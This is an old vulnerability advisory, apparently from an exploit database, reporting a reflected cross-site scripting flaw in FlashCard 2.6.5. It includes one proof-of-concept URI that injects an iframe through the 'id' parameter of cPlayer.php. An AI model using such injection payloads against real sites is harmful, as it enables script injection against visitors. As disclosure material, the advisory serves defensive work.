FlashCard 2.6.5 XSS Vulnerability

2010-04-22 / 2010-04-23
Credit: Valentin
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: FlashCard XSS Vulnerability # Date: 22.04.2010 # Author: Valentin # Category: webapps/0day # Version: Only tested with 2.6.5, other versions may also be affected # Tested on: # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> >> General Information Advisory/Exploit Title = FlashCard XSS Vulnerability Author = Valentin Hoebel Contact = valentin@xenuser.org [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> >> Product information Name = FlashCard Vendor = tufat.com Vendor Website = http://www.tufat.com/script9.htm Affected Version(s) = Only tested with 2.6.5, other versions may also be affected [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> >> #1 Vulnerability Type = XSS Example URI = flashcard/stateless/cPlayer.php?id="><iframe src=http://www.google.de> [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> >> Additional Information Advisory/Exploit Published = 22.04.2010 [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] |:: >> Misc |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase! [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top